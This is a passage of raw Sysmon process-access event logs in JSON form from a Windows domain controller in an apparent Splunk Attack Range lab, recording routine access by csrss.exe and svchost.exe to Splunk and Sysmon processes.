Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-0010AC970600}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-0010AC970600}","TargetProcessId":"3220","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 